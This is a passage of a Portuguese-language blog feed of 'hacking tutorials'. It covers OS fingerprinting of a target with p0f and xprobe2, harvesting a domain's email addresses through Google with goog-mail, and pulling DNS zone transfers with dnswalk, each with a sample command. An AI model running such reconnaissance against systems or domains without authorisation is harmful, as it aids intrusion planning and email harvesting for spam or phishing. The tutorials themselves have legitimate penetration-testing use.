style=&quot;-webkit-box-shadow: rgb(153, 153, 170) 2px 2px 4px; background-color: #c9d7f1; box-shadow: rgb(153, 153, 170) 2px 2px 4px; box-sizing: border-box; position: relative;&quot;&gt;http://code.google.com/p/wpscan/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif; font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: arial, sans-serif; font-size: 13px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;</description><link>http://max-sec.blogspot.com/2012/01/descobrindo-vunerabilidade-em-wordpress.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHciJTZ-B7eXEVXSOgGnT5yirVbBG08uKZiZYKJLtrKZu0F0BeoECrk2l2aZAIA8_2aOv5zWCtwbxESZpcBk4-Ei4aPk7VtW8bDjUpF4eOZWyjBR1cxmbQ0WG_uFvF5QGVRKtTXRGWpcwk/s72-c/wordpress.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-2620163647413218293</guid><pubDate>Wed, 04 Jan 2012 23:23:00 +0000</pubDate><atom:updated>2013-07-24T09:15:05.166-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>Descobrindo o sistema operacional do alvo !</title><description>&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://radames.manosso.nom.br/bitabit/files/sistemas-operacionais.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;br class=&quot;Apple-interchange-newline&quot; /&gt;&lt;img border=&quot;0&quot; height=&quot;252&quot; src=&quot;http://radames.manosso.nom.br/bitabit/files/sistemas-operacionais.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Depois de ter certeza que o alvo esta online, então podemos descobrir o sistema operacional da maquina, Este método é conhecido como fingerprinting OS.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Existe dois métodos de fingerprinting: Ativo e Passivo.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;No método ativo, a ferramenta envia pacotes de rede para a máquina-alvo e, em seguida,&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;que determina o sistema operacional da máquina de destino com base na análise feita&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;sobre a resposta que recebeu. A vantagem deste método é que o fingerprinting&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;processo é rápido. No entanto, a desvantagem é que a máquina de destino pode notar a nossa tentativa de obter as informações do sistema operacional.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Para superar a desvantagem método ativo, existe um método passivo para SO&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;fingerprinting. Este método foi iniciada por Michal Zalewsky quando ele lançou&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;uma ferramenta chamada p0f. A desvantagem do método passivo é que o processo será&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;mais lento em comparação com o método ativo.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;p0f&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;p0f usa uma técnica de Fingerprinting OS baseada na análise da estrutura de um pacote TCP / IP para determinar o sistema operacional e outras propriedades de configuração de um host remoto. O processo é totalmente passivo e não gera qualquer tráfego de rede suspeito. O outro host tem que:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; - Conectar a sua rede - tanto espontaneamente ou de forma induzida, por exemplo quando se tenta estabelecer um fluxo de dados ftp, utilizando IRC...&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; - Ou ser contactado por alguma entidade em sua rede usando alguns métodos padrões (tais como navegação na web), que pode aceitar ou recusar a conexão.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; O método pode ver através de firewalls de pacotes e não tem as restrições de um fingerprinting ativo. Os principais usos da detecção passiva de SO são perfis atacante (IDS e honeypots), perfis de visitante (otimização de conteúdo), cliente / usuário profiling (aplicação da política), pen-teste, etc&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Vamos usar p0f em um caso muito simples. Basta digitar o seguinte comando no console:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;# &lt;b&gt;P0f -i wlan0&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Use o (-i) para especificar qual interface de rede o p0f vai usar. exemplo (p0f -i wlan0) &amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Em seguida você precisa gerar atividades de rede que envolve a conexão TCP,tais como navegação para a máquina remota ou deixar a máquina remota &amp;nbsp;se conectar na sua máquina.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 16px;&quot;&gt;&lt;span class=&quot;hps&quot; style=&quot;background-color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjBHftoauR9ZEImwZaLt2XSAOm4xd7LReD3S_fry9DQb1vtyineQRa0XcQb_gJrzDNxPMpEo2IkHlh6s0lylhUBQqy2UcPUy9SBsv3IbfUOMcHf___WO8NiEacmlyVy2ytiNZawAwCSXC/s1600/Screenshot-3.png&quot; imageanchor=&quot;1&quot; style=&quot;background-color: white; margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;222&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjBHftoauR9ZEImwZaLt2XSAOm4xd7LReD3S_fry9DQb1vtyineQRa0XcQb_gJrzDNxPMpEo2IkHlh6s0lylhUBQqy2UcPUy9SBsv3IbfUOMcHf___WO8NiEacmlyVy2ytiNZawAwCSXC/s320/Screenshot-3.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;&lt;span class=&quot;hps&quot; style=&quot;background-color: white;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;Com base no resultado anterior, sabemos que a máquina remota é uma máquina Linux 2.6.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;Você pode parar p0f pressionando a combinação Ctrl + C&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: large;&quot;&gt;Xprobe2&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;xprobe2 é uma ferramenta de fingerprinting OS do tipo ativa com uma abordagem diferente para fingerprinting.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;você pode apenas chamar xprobe2 e dar o endereço IP da máquina ou o nome como o argumento:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;b&gt;# xprobe2 52.1.1.1&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 16px;&quot;&gt;&lt;span class=&quot;hps&quot; style=&quot;background-color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #333333; font-family: arial, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIMchhEg3I3-xJKPquakNEIOqyl8_LVhI8rjm48zvVFMOi47QGRliAPZYetqXzzKwPDJr5qOp1M88tqFCEWLFQ_cJFkqSkxTRturNKFRq7OgWq9LV9qF_CjnN_ZtX4uMqL2gDAw9rXx7V/s1600/xprobe.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;219&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcIMchhEg3I3-xJKPquakNEIOqyl8_LVhI8rjm48zvVFMOi47QGRliAPZYetqXzzKwPDJr5qOp1M88tqFCEWLFQ_cJFkqSkxTRturNKFRq7OgWq9LV9qF_CjnN_ZtX4uMqL2gDAw9rXx7V/s320/xprobe.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: whitesmoke; color: #333333; font-family: arial, sans-serif; font-size: 16px;&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: whitesmoke; color: #333333; font-family: arial, sans-serif; font-size: 16px;&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://max-sec.blogspot.com/2012/01/descobrindo-o-sistema-operacional-do.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUjBHftoauR9ZEImwZaLt2XSAOm4xd7LReD3S_fry9DQb1vtyineQRa0XcQb_gJrzDNxPMpEo2IkHlh6s0lylhUBQqy2UcPUy9SBsv3IbfUOMcHf___WO8NiEacmlyVy2ytiNZawAwCSXC/s72-c/Screenshot-3.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-4683857771619920978</guid><pubDate>Fri, 23 Dec 2011 15:30:00 +0000</pubDate><atom:updated>2013-07-24T09:15:24.201-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>Usando o goog-mail para extrair emails através do google.</title><description>O &lt;b&gt;goog-mail&lt;/b&gt; é um script escrito em python que extrai emails de um determinado dominio através do google.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Usar : ./goog-mail.py &amp;lt;dominio&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4B9DxgWpv2fSXca8YCiEbkyagJ-GW3OejXILM848Ab7mGtj7kQEx9xoagnIAMVezJiAtUsPbYJjDtBYD_J2UgcrbmSIquwnOrb4ENVgJV5-NK33W8M9F1u2I2vvg5VTPNQG_L0QogGrR/s1600/email.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;222&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4B9DxgWpv2fSXca8YCiEbkyagJ-GW3OejXILM848Ab7mGtj7kQEx9xoagnIAMVezJiAtUsPbYJjDtBYD_J2UgcrbmSIquwnOrb4ENVgJV5-NK33W8M9F1u2I2vvg5VTPNQG_L0QogGrR/s320/email.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://www.koders.com/python/fid7E5CF7E69960B5B2C69F0541F01BE0E238A974A1.aspx?s=python#L1&quot; target=&quot;_blank&quot;&gt;Download do goog-mail&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><link>http://max-sec.blogspot.com/2011/12/usando-o-goog-mail-para-extrair-emails.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4B9DxgWpv2fSXca8YCiEbkyagJ-GW3OejXILM848Ab7mGtj7kQEx9xoagnIAMVezJiAtUsPbYJjDtBYD_J2UgcrbmSIquwnOrb4ENVgJV5-NK33W8M9F1u2I2vvg5VTPNQG_L0QogGrR/s72-c/email.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-564581403700233973</guid><pubDate>Fri, 23 Dec 2011 15:09:00 +0000</pubDate><atom:updated>2013-07-24T09:15:46.563-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>Usando o dnswalk para transferir zona de DNS.</title><description>&lt;br /&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;dnswalk&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;é um depurador de&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;DNS.&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;Ela realiza&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;transferências de zona&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;dos domínios&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;especificados&lt;/span&gt;, &lt;span class=&quot;hps&quot;&gt;e verifica o&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;banco de dados&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;de várias maneiras&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;para&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;consistência interna&lt;/span&gt;, bem como &lt;span class=&quot;hps&quot;&gt;a precisã&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;o.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;A transferência de zona é o termo usado para referir-se o processo pelo qual o conteúdo de um arquivo de zona DNS é copiado de um servidor DNS primário para um servidor DNS secundário.&lt;br /&gt;&lt;br /&gt;No caso vamos copiar para o nosso PC.&lt;br /&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;Como usar:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;dnswalk dominio&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;domínio&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;deve terminar com&lt;/span&gt; &lt;span class=&quot;hps&quot;&gt;um &#39;.&#39;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;root@laptop:~/$ dnswalk site.com.br.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZpSarXWGZ4i-hyj9EV2MvNobj0vtrtBZYS-ohJ-VNUotipQ1L3ja0B4jPBQ0NMs-xfLEsF1zy_W83gHq18Ows9SqfsKHMbAIEQoRnrruYRH3kmmG3bqigf0b1iEk7En37nbsJJpOyu7W/s1600/Screenshot-1.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;257&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZpSarXWGZ4i-hyj9EV2MvNobj0vtrtBZYS-ohJ-VNUotipQ1L3ja0B4jPBQ0NMs-xfLEsF1zy_W83gHq18Ows9SqfsKHMbAIEQoRnrruYRH3kmmG3bqigf0b1iEk7En37nbsJJpOyu7W/s320/Screenshot-1.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; print do dnswalk em execução&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;short_text&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/dnswalk/&quot;&gt;Download: DNSWALK&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;&quot; id=&quot;result_box&quot; lang=&quot;pt&quot;&gt;&lt;span class=&quot;hps&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://max-sec.blogspot.com/2011/12/usando-o-dnswalk-para-transferir-zona.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9ZpSarXWGZ4i-hyj9EV2MvNobj0vtrtBZYS-ohJ-VNUotipQ1L3ja0B4jPBQ0NMs-xfLEsF1zy_W83gHq18Ows9SqfsKHMbAIEQoRnrruYRH3kmmG3bqigf0b1iEk7En37nbsJJpOyu7W/s72-c/Screenshot-1.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-243961777414164013</guid><pubDate>Fri, 23 Dec 2011 13:47:00 +0000</pubDate><atom:updated>2013-07-24T09:16:07.194-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>Usando o metagoofil para extrair arquivos do site.</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
